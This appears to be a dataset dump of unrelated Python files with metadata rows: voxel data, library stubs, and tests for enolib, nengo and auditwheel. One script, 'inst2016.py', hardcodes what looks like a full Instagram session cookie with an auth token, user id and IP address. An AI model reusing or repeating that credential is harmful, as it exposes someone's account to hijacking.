VM[7,10,9] = 0.00
VM[8,10,9] = 0.00
VM[9,10,9] = 0.00
VM[10,10,9] = 0.00
VM[0,0,10] = 0.00
VM[1,0,10] = 0.00
VM[2,0,10] = 0.00
VM[3,0,10] = 0.00
VM[4,0,10] = 0.00
VM[5,0,10] = 0.00
VM[6,0,10] = 0.00
VM[7,0,10] = 0.00
VM[8,0,10] = 0.00
VM[9,0,10] = 0.00
VM[10,0,10] = 0.00
VM[0,1,10] = 0.00
VM[1,1,10] = 0.00
VM[2,1,10] = 0.00
VM[3,1,10] = 0.00
VM[4,1,10] = 0.00
VM[5,1,10] = 0.00
VM[6,1,10] = 0.00
VM[7,1,10] = 0.00
VM[8,1,10] = 0.00
VM[9,1,10] = 0.00
VM[10,1,10] = 0.00
VM[0,2,10] = 0.00
VM[1,2,10] = 0.00
VM[2,2,10] = 0.00
VM[3,2,10] = 0.00
VM[4,2,10] = 0.07
VM[5,2,10] = 0.14
VM[6,2,10] = 0.07
VM[7,2,10] = 0.00
VM[8,2,10] = 0.00
VM[9,2,10] = 0.00
VM[10,2,10] = 0.00
VM[0,3,10] = 0.00
VM[1,3,10] = 0.00
VM[2,3,10] = 0.00
VM[3,3,10] = 0.21
VM[4,3,10] = 0.52
VM[5,3,10] = 0.60
VM[6,3,10] = 0.52
VM[7,3,10] = 0.21
VM[8,3,10] = 0.00
VM[9,3,10] = 0.00
VM[10,3,10] = 0.00
VM[0,4,10] = 0.00
VM[1,4,10] = 0.00
VM[2,4,10] = 0.07
VM[3,4,10] = 0.52
VM[4,4,10] = 0.80
VM[5,4,10] = 0.90
VM[6,4,10] = 0.80
VM[7,4,10] = 0.52
VM[8,4,10] = 0.07
VM[9,4,10] = 0.00
VM[10,4,10] = 0.00
VM[0,5,10] = 0.00
VM[1,5,10] = 0.00
VM[2,5,10] = 0.14
VM[3,5,10] = 0.60
VM[4,5,10] = 0.90
VM[5,5,10] = 1.00
VM[6,5,10] = 0.90
VM[7,5,10] = 0.60
VM[8,5,10] = 0.14
VM[9,5,10] = 0.00
VM[10,5,10] = 0.00
VM[0,6,10] = 0.00
VM[1,6,10] = 0.00
VM[2,6,10] = 0.07
VM[3,6,10] = 0.52
VM[4,6,10] = 0.80
VM[5,6,10] = 0.90
VM[6,6,10] = 0.80
VM[7,6,10] = 0.52
VM[8,6,10] = 0.07
VM[9,6,10] = 0.00
VM[10,6,10] = 0.00
VM[0,7,10] = 0.00
VM[1,7,10] = 0.00
VM[2,7,10] = 0.00
VM[3,7,10] = 0.21
VM[4,7,10] = 0.52
VM[5,7,10] = 0.60
VM[6,7,10] = 0.52
VM[7,7,10] = 0.21
VM[8,7,10] = 0.00
VM[9,7,10] = 0.00
VM[10,7,10] = 0.00
VM[0,8,10] = 0.00
VM[1,8,10] = 0.00
VM[2,8,10] = 0.00
VM[3,8,10] = 0.00
VM[4,8,10] = 0.07
VM[5,8,10] = 0.14
VM[6,8,10] = 0.07
VM[7,8,10] = 0.00
VM[8,8,10] = 0.00
VM[9,8,10] = 0.00
VM[10,8,10] = 0.00
VM[0,9,10] = 0.00
VM[1,9,10] = 0.00
VM[2,9,10] = 0.00
VM[3,9,10] = 0.00
VM[4,9,10] = 0.00
VM[5,9,10] = 0.00
VM[6,9,10] = 0.00
VM[7,9,10] = 0.00
VM[8,9,10] = 0.00
VM[9,9,10] = 0.00
VM[10,9,10] = 0.00
VM[0,10,10] = 0.00
VM[1,10,10] = 0.00
VM[2,10,10] = 0.00
VM[3,10,10] = 0.00
VM[4,10,10] = 0.00
VM[5,10,10] = 0.00
VM[6,10,10] = 0.00
VM[7,10,10] = 0.00
VM[8,10,10] = 0.00
VM[9,10,10] = 0.00
VM[10,10,10] = 0.00
N = 11
M = 11
K = 11
g = draw_voxel_model(VM, N, M, K)
| 17.467495 | 82 | 0.481328 | 8,150 | 23,913 | 1.410184 | 0.011043 | 0.305577 | 0.203167 | 0.043853 | 0.956669 | 0 | 0 | 0 | 0 | 0 | 0 | 0.427014 | 0.179233 | 23,913 | 1,368 | 83 | 17.480263 | 0.158557 | 0 | 0 | 0 | 0 | 0 | 0.000125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.000734 | false | 0 | 0.001467 | 0 | 0.002935 | 0 | 0 | 0 | 1 | null | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
97f41302bffab8aea500ac607cc8ac3aa035a62b | 59 | py | Python | kornia/io/__init__.py | kornia/kornia-io | 35b121f1a434a3868d346a757be0ec24bbdaee65 | [
"Apache-2.0"
] | 2 | 2020-04-12T10:17:14.000Z | 2021-12-22T14:50:17.000Z | kornia/io/__init__.py | kornia/kornia-io | 35b121f1a434a3868d346a757be0ec24bbdaee65 | [
"Apache-2.0"
] | null | null | null | kornia/io/__init__.py | kornia/kornia-io | 35b121f1a434a3868d346a757be0ec24bbdaee65 | [
"Apache-2.0"
] | null | null | null | from .dali import DaliImageReader, DaliImageCollateWrapper
| 29.5 | 58 | 0.881356 | 5 | 59 | 10.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084746 | 59 | 1 | 59 | 59 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3f53b0d2db6006a738ae704fe74197533caab1c6 | 651 | py | Python | examples/minitwit/inst2016.py | txdywy/flask | 5cf167b448267aedec8f5b2e30ad4ee0ad9b3f55 | [
"BSD-3-Clause"
] | 2 | 2015-08-07T18:01:01.000Z | 2015-08-14T03:29:10.000Z | examples/minitwit/inst2016.py | txdywy/flask | 5cf167b448267aedec8f5b2e30ad4ee0ad9b3f55 | [
"BSD-3-Clause"
] | 2 | 2015-03-30T05:28:35.000Z | 2015-06-28T01:08:50.000Z | examples/minitwit/inst2016.py | txdywy/flask | 5cf167b448267aedec8f5b2e30ad4ee0ad9b3f55 | [
"BSD-3-Clause"
] | 2 | 2015-03-04T05:06:55.000Z | 2015-03-29T22:46:19.000Z | import mei
import time
t = "IGSC341f55974baadb2775ff551acc9fb1625fb9466061411e4e6a8ad0cd8806d7c0%3AUQR4evOb50AbefuIH60POSuGzddobOKU%3A%7B%22asns%22%3A%7B%22time%22%3A1498550402%2C%2223.99.114.67%22%3A8075%7D%2C%22_auth_user_hash%22%3A%22%22%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_token%22%3A%222969173752%3AZOYZQFh3sPzMzvhXQ51CooOAbUVvhq8F%3A8b8c328f724c0df8c8cba73615054f50873ccdd33e8f3b6a97e5b222759cd654%22%2C%22_token_ver%22%3A2%2C%22_platform%22%3A4%2C%22_auth_user_id%22%3A2969173752%2C%22last_refreshed%22%3A1498550403.2377448082%7D;"
for i in range(10):
    mei.test_new(t)
    time.sleep(60)
| 81.375 | 566 | 0.855607 | 90 | 651 | 6.022222 | 0.544444 | 0.04428 | 0.04428 | 0.066421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.377389 | 0.03533 | 651 | 7 | 567 | 93 | 0.485669 | 0 | 0 | 0 | 0 | 0.166667 | 0.860215 | 0.860215 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
58c672442b8959c32add3d6af0706cda47534803 | 32 | py | Python | src/example_package/random_file.py | szemyd/packaging-python-public | e16fed1f335d5f5153f21e40afb1add21c712973 | [
"MIT"
] | null | null | null | src/example_package/random_file.py | szemyd/packaging-python-public | e16fed1f335d5f5153f21e40afb1add21c712973 | [
"MIT"
] | null | null | null | src/example_package/random_file.py | szemyd/packaging-python-public | e16fed1f335d5f5153f21e40afb1add21c712973 | [
"MIT"
] | null | null | null | def random_function():
pass
| 10.666667 | 22 | 0.6875 | 4 | 32 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.21875 | 32 | 2 | 23 | 16 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
58e32aefef70cad8d1a60c31bff1a82852871c22 | 19 | py | Python | pyocs/__init__.py | rzshrote/PyOCS | c02422b418961aa5a1f308d0251b8bf551912db2 | [
"Apache-2.0"
] | null | null | null | pyocs/__init__.py | rzshrote/PyOCS | c02422b418961aa5a1f308d0251b8bf551912db2 | [
"Apache-2.0"
] | null | null | null | pyocs/__init__.py | rzshrote/PyOCS | c02422b418961aa5a1f308d0251b8bf551912db2 | [
"Apache-2.0"
] | null | null | null | from .ocs import *
| 9.5 | 18 | 0.684211 | 3 | 19 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 19 | 1 | 19 | 19 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
450ce03465dd38bb4ca1b797bfd63bb0d079a316 | 1,930 | py | Python | python/tests/generated/errors/parsing/test_missing_element_for_continuation.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | [
"MIT"
] | 17 | 2019-04-15T21:03:37.000Z | 2022-01-24T11:03:34.000Z | python/tests/generated/errors/parsing/test_missing_element_for_continuation.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | [
"MIT"
] | 20 | 2019-03-13T23:23:40.000Z | 2022-03-29T13:40:57.000Z | python/tests/generated/errors/parsing/test_missing_element_for_continuation.py | eno-lang/enolib | 4175f7c1e8246493b6758c29bddc80d20eaf15f7 | [
"MIT"
] | 4 | 2019-04-15T21:18:03.000Z | 2019-09-21T16:18:10.000Z | import enolib
def test_parsing_a_line_continuation_without_any_prior_element_raises_the_expected_parseerror():
error = None
input = ("| continuation")
try:
enolib.parse(input)
except enolib.ParseError as _error:
if isinstance(_error, enolib.ParseError):
error = _error
else:
raise _error
assert type(error) is enolib.ParseError
text = ("Line 1 contains a line continuation without a continuable element being specified before.")
assert error.text == text
snippet = (" Line | Content\n"
" > 1 | | continuation")
assert error.snippet == snippet
assert error.selection['from']['line'] == 0
assert error.selection['from']['column'] == 0
assert error.selection['to']['line'] == 0
assert error.selection['to']['column'] == 14
def test_parsing_a_line_continuation_preceded_by_a_copied_field_raises_the_expected_parseerror():
error = None
input = ("field: value\n"
"\n"
"copy < field\n"
"| illegal_continuation")
try:
enolib.parse(input)
except enolib.ParseError as _error:
if isinstance(_error, enolib.ParseError):
error = _error
else:
raise _error
assert type(error) is enolib.ParseError
text = ("Line 4 contains a line continuation without a continuable element being specified before.")
assert error.text == text
snippet = (" Line | Content\n"
" ...\n"
" 2 | \n"
" 3 | copy < field\n"
" > 4 | | illegal_continuation")
assert error.snippet == snippet
assert error.selection['from']['line'] == 3
assert error.selection['from']['column'] == 0
assert error.selection['to']['line'] == 3
assert error.selection['to']['column'] == 22 | 29.692308 | 104 | 0.58601 | 209 | 1,930 | 5.244019 | 0.272727 | 0.120438 | 0.145985 | 0.087591 | 0.895985 | 0.841241 | 0.784672 | 0.709854 | 0.709854 | 0.709854 | 0 | 0.011896 | 0.303109 | 1,930 | 65 | 105 | 29.692308 | 0.802974 | 0 | 0 | 0.553191 | 0 | 0 | 0.230968 | 0 | 0 | 0 | 0 | 0 | 0.297872 | 1 | 0.042553 | false | 0 | 0.021277 | 0 | 0.06383 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4513f4aed71a1d907d2b7f0c327e4f99644ddd96 | 49 | py | Python | oceans/plotting/__init__.py | arnaldorusso/python-oceans | fb4dc2a7ee1add14b023b4830f47993061fe2e6a | [
"MIT"
] | null | null | null | oceans/plotting/__init__.py | arnaldorusso/python-oceans | fb4dc2a7ee1add14b023b4830f47993061fe2e6a | [
"MIT"
] | null | null | null | oceans/plotting/__init__.py | arnaldorusso/python-oceans | fb4dc2a7ee1add14b023b4830f47993061fe2e6a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .plotting import *
| 12.25 | 23 | 0.571429 | 6 | 49 | 4.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.204082 | 49 | 3 | 24 | 16.333333 | 0.692308 | 0.428571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
452a06e1996d47be0d14cef67bc448612881b74e | 2,462 | py | Python | nengo/utils/tests/test_functions_piecewise.py | HugoChateauLaurent/nengo | 749893186ee09aa6c621a40da3ffd3878114db9c | [
"BSD-2-Clause"
] | null | null | null | nengo/utils/tests/test_functions_piecewise.py | HugoChateauLaurent/nengo | 749893186ee09aa6c621a40da3ffd3878114db9c | [
"BSD-2-Clause"
] | null | null | null | nengo/utils/tests/test_functions_piecewise.py | HugoChateauLaurent/nengo | 749893186ee09aa6c621a40da3ffd3878114db9c | [
"BSD-2-Clause"
] | null | null | null | import numpy as np
import pytest
from nengo.exceptions import ValidationError
from nengo.utils.functions import piecewise
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_basic():
f = piecewise({0.5: 1, 1.0: 0})
assert np.allclose(f(-10), [0])
assert np.allclose(f(0), [0])
assert np.allclose(f(0.25), [0])
assert np.allclose(f(0.5), [1])
assert np.allclose(f(0.75), [1])
assert np.allclose(f(1.0), [0])
assert np.allclose(f(1.5), [0])
assert np.allclose(f(100), [0])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_lists():
f = piecewise({0.5: [1, 0], 1.0: [0, 1]})
assert np.allclose(f(-10), [0, 0])
assert np.allclose(f(0), [0, 0])
assert np.allclose(f(0.25), [0, 0])
assert np.allclose(f(0.5), [1, 0])
assert np.allclose(f(0.75), [1, 0])
assert np.allclose(f(1.0), [0, 1])
assert np.allclose(f(1.5), [0, 1])
assert np.allclose(f(100), [0, 1])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_invalid_key():
with pytest.raises(ValidationError):
f = piecewise({0.5: 1, 1: 0, 'a': 0.2})
assert f
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_invalid_length():
with pytest.raises(ValidationError):
f = piecewise({0.5: [1, 0], 1.0: [1, 0, 0]})
assert f
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_invalid_function_length():
with pytest.raises(ValidationError):
f = piecewise({0.5: 0, 1.0: lambda t: [t, t ** 2]})
assert f
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_function():
f = piecewise({0: np.sin, 0.5: np.cos})
assert np.allclose(f(0), [np.sin(0)])
assert np.allclose(f(0.25), [np.sin(0.25)])
assert np.allclose(f(0.4999), [np.sin(0.4999)])
assert np.allclose(f(0.5), [np.cos(0.5)])
assert np.allclose(f(0.75), [np.cos(0.75)])
assert np.allclose(f(1.0), [np.cos(1.0)])
@pytest.mark.filterwarnings('ignore::DeprecationWarning')
def test_function_list():
def func1(t):
return t, t**2, t**3
def func2(t):
return t**4, t**5, t**6
f = piecewise({0: func1, 0.5: func2})
assert np.allclose(f(0), func1(0))
assert np.allclose(f(0.25), func1(0.25))
assert np.allclose(f(0.4999), func1(0.4999))
assert np.allclose(f(0.5), func2(0.5))
assert np.allclose(f(0.75), func2(0.75))
assert np.allclose(f(1.0), func2(1.0))
| 30.02439 | 59 | 0.622665 | 406 | 2,462 | 3.746305 | 0.123153 | 0.147272 | 0.294543 | 0.312952 | 0.806049 | 0.780408 | 0.748849 | 0.57002 | 0.257068 | 0.132807 | 0 | 0.089295 | 0.176686 | 2,462 | 81 | 60 | 30.395062 | 0.661075 | 0 | 0 | 0.206349 | 0 | 0 | 0.07433 | 0.073924 | 0 | 0 | 0 | 0 | 0.492063 | 1 | 0.142857 | false | 0 | 0.063492 | 0.031746 | 0.238095 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7a0c067979eaca2f0dbd403e40b13050c938165c | 4,652 | py | Python | tests/unit/test_repair.py | luminartech/auditwheel | 83440f278c7c12c265c5e6d450305facc29f0a5e | [
"BSD-2-Clause"
] | 280 | 2016-02-07T18:41:15.000Z | 2022-03-26T05:28:26.000Z | tests/unit/test_repair.py | luminartech/auditwheel | 83440f278c7c12c265c5e6d450305facc29f0a5e | [
"BSD-2-Clause"
] | 331 | 2016-02-01T19:19:31.000Z | 2022-03-25T01:30:27.000Z | tests/unit/test_repair.py | luminartech/auditwheel | 83440f278c7c12c265c5e6d450305facc29f0a5e | [
"BSD-2-Clause"
] | 110 | 2016-03-16T11:33:18.000Z | 2022-02-23T11:58:21.000Z | import os
from unittest.mock import call, patch
from auditwheel.patcher import Patchelf
from auditwheel.repair import append_rpath_within_wheel
@patch("auditwheel.patcher._verify_patchelf")
@patch("auditwheel.patcher.check_output")
@patch("auditwheel.patcher.check_call")
class TestRepair:
def test_append_rpath(self, check_call, check_output, _):
patcher = Patchelf()
# When a library has an existing RPATH entry within wheel_dir
existing_rpath = b"$ORIGIN/.existinglibdir"
check_output.return_value = existing_rpath
wheel_dir = "."
lib_name = "test.so"
full_lib_name = os.path.abspath(lib_name)
append_rpath_within_wheel(lib_name, "$ORIGIN/.lib", wheel_dir, patcher)
check_output_expected_args = [
call(["patchelf", "--print-rpath", full_lib_name])
]
# Then that entry is preserved when updating the RPATH
check_call_expected_args = [
call(["patchelf", "--remove-rpath", full_lib_name]),
call(
[
"patchelf",
"--force-rpath",
"--set-rpath",
f"{existing_rpath.decode()}:$ORIGIN/.lib",
full_lib_name,
]
),
]
assert check_output.call_args_list == check_output_expected_args
assert check_call.call_args_list == check_call_expected_args
def test_append_rpath_reject_outside_wheel(self, check_call, check_output, _):
patcher = Patchelf()
# When a library has an existing RPATH entry outside wheel_dir
existing_rpath = b"/outside/wheel/dir"
check_output.return_value = existing_rpath
wheel_dir = "/not/outside"
lib_name = "test.so"
full_lib_name = os.path.abspath(lib_name)
append_rpath_within_wheel(lib_name, "$ORIGIN/.lib", wheel_dir, patcher)
check_output_expected_args = [
call(["patchelf", "--print-rpath", full_lib_name])
]
# Then that entry is eliminated when updating the RPATH
check_call_expected_args = [
call(["patchelf", "--remove-rpath", full_lib_name]),
call(
[
"patchelf",
"--force-rpath",
"--set-rpath",
"$ORIGIN/.lib",
full_lib_name,
]
),
]
assert check_output.call_args_list == check_output_expected_args
assert check_call.call_args_list == check_call_expected_args
def test_append_rpath_ignore_duplicates(self, check_call, check_output, _):
patcher = Patchelf()
# When a library has an existing RPATH entry and we try and append it again
existing_rpath = b"$ORIGIN"
check_output.return_value = existing_rpath
wheel_dir = "."
lib_name = "test.so"
full_lib_name = os.path.abspath(lib_name)
append_rpath_within_wheel(lib_name, "$ORIGIN", wheel_dir, patcher)
check_output_expected_args = [
call(["patchelf", "--print-rpath", full_lib_name])
]
# Then that entry is ignored when updating the RPATH
check_call_expected_args = [
call(["patchelf", "--remove-rpath", full_lib_name]),
call(
["patchelf", "--force-rpath", "--set-rpath", "$ORIGIN", full_lib_name]
),
]
assert check_output.call_args_list == check_output_expected_args
assert check_call.call_args_list == check_call_expected_args
def test_append_rpath_ignore_relative(self, check_call, check_output, _):
patcher = Patchelf()
# When a library has an existing RPATH entry but it cannot be resolved
# to an absolute path, it is eliminated
existing_rpath = b"not/absolute"
check_output.return_value = existing_rpath
wheel_dir = "."
lib_name = "test.so"
full_lib_name = os.path.abspath(lib_name)
append_rpath_within_wheel(lib_name, "$ORIGIN", wheel_dir, patcher)
check_output_expected_args = [
call(["patchelf", "--print-rpath", full_lib_name])
]
# Then that entry is ignored when updating the RPATH
check_call_expected_args = [
call(["patchelf", "--remove-rpath", full_lib_name]),
call(
["patchelf", "--force-rpath", "--set-rpath", "$ORIGIN", full_lib_name]
),
]
assert check_output.call_args_list == check_output_expected_args
assert check_call.call_args_list == check_call_expected_args
| 40.103448 | 86 | 0.612425 | 540 | 4,652 | 4.925926 | 0.142593 | 0.073684 | 0.066165 | 0.069173 | 0.809023 | 0.792481 | 0.792481 | 0.792481 | 0.776316 | 0.776316 | 0 | 0 | 0.290198 | 4,652 | 115 | 87 | 40.452174 | 0.805572 | 0.10963 | 0 | 0.677083 | 0 | 0 | 0.145208 | 0.037754 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.041667 | false | 0 | 0.041667 | 0 | 0.09375 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7a0d4755742d3c57ea1bebff1a07e0e2429908b6 | 69 | py | Python | contesto/utils/lambda_object.py | kaktaktoa/contesto | c31d10959abf1397182c24216880c487d29ac184 | [
"MIT"
] | null | null | null | contesto/utils/lambda_object.py | kaktaktoa/contesto | c31d10959abf1397182c24216880c487d29ac184 | [
"MIT"
] | null | null | null | contesto/utils/lambda_object.py | kaktaktoa/contesto | c31d10959abf1397182c24216880c487d29ac184 | [
"MIT"
] | null | null | null | def LambdaObject():
return type('LambdaObject', (object,), {})()
| 23 | 48 | 0.623188 | 6 | 69 | 7.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144928 | 69 | 2 | 49 | 34.5 | 0.728814 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
e1350354e041c53cb2aafc1747d8dd85b1f91903 | 350 | py | Python | proboards_scraper/scraper/__init__.py | ScottMastro/proboards-scraper | d970ba14b3ab4ea0b210f4d78664be4a13ca442a | [
"MIT"
] | 2 | 2021-07-05T12:03:00.000Z | 2022-03-06T21:31:49.000Z | proboards_scraper/scraper/__init__.py | ScottMastro/proboards-scraper | d970ba14b3ab4ea0b210f4d78664be4a13ca442a | [
"MIT"
] | 17 | 2021-05-17T03:46:46.000Z | 2022-03-11T21:19:45.000Z | proboards_scraper/scraper/__init__.py | ScottMastro/proboards-scraper | d970ba14b3ab4ea0b210f4d78664be4a13ca442a | [
"MIT"
] | 2 | 2022-01-21T22:03:07.000Z | 2022-02-17T21:38:38.000Z | from .scrape import (
scrape_board, scrape_forum, scrape_poll, scrape_shoutbox,
scrape_smileys, scrape_thread, scrape_user, scrape_users,
)
from .utils import split_url
__all__ = [
"scrape_board", "scrape_forum", "scrape_poll", "scrape_shoutbox",
"scrape_smileys", "scrape_thread", "scrape_user", "scrape_users",
"split_url",
]
| 26.923077 | 69 | 0.731429 | 43 | 350 | 5.44186 | 0.348837 | 0.094017 | 0.145299 | 0.188034 | 0.786325 | 0.786325 | 0.786325 | 0.786325 | 0.786325 | 0.786325 | 0 | 0 | 0.148571 | 350 | 12 | 70 | 29.166667 | 0.785235 | 0 | 0 | 0 | 0 | 0 | 0.311429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e14113a4ab06ee975be83075712e9d1190dfcb4d | 45 | py | Python | models/ops/depthavgpooling/modules/__init__.py | E18301194/DepthAwareCNN | 8ae98f7f18b69f79e7df03397dec2543d3d0c8eb | [
"MIT"
] | 278 | 2018-05-09T03:08:56.000Z | 2022-03-10T08:05:10.000Z | models/ops/depthavgpooling/modules/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 35 | 2018-05-31T15:42:44.000Z | 2022-03-17T09:36:13.000Z | models/ops/depthavgpooling/modules/__init__.py | jfzhang95/DepthAwareCNN | 2076c751279637f112d9ea9ce33459b6f3b20063 | [
"MIT"
] | 80 | 2018-06-03T10:04:48.000Z | 2022-03-05T12:57:31.000Z | from .depthavgpooling import Depthavgpooling
| 22.5 | 44 | 0.888889 | 4 | 45 | 10 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.97561 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e1a000c7113a09deb6f5c8b378767f827a2d33ea | 190 | py | Python | postalcodes_ni/exceptions.py | oscarmcm/postalcodes-ni | adf04e73f076d2cefab71d8266d33e272eeb0af8 | [
"MIT"
] | 3 | 2019-03-28T16:14:13.000Z | 2019-03-28T17:16:22.000Z | postalcodes_ni/exceptions.py | oscarmcm/postalcodes-ni | adf04e73f076d2cefab71d8266d33e272eeb0af8 | [
"MIT"
] | null | null | null | postalcodes_ni/exceptions.py | oscarmcm/postalcodes-ni | adf04e73f076d2cefab71d8266d33e272eeb0af8 | [
"MIT"
] | null | null | null | class ISOCodeError(Exception):
""" Thrown when ISO code doesnt exists
"""
pass
class PostalCodeError(Exception):
""" Thrown when postal code doesnt exists
"""
pass
| 17.272727 | 45 | 0.652632 | 20 | 190 | 6.2 | 0.6 | 0.241935 | 0.306452 | 0.322581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.252632 | 190 | 10 | 46 | 19 | 0.873239 | 0.405263 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
becb55f399547d4b74117ed5e2f1d11d6c064bb0 | 39 | py | Python | scripts/generate_secret.py | rohittiwari07/coinculture | 57523a52c57ceb71b09a28a951f8ad61decf835d | [
"Apache-2.0"
] | null | null | null | scripts/generate_secret.py | rohittiwari07/coinculture | 57523a52c57ceb71b09a28a951f8ad61decf835d | [
"Apache-2.0"
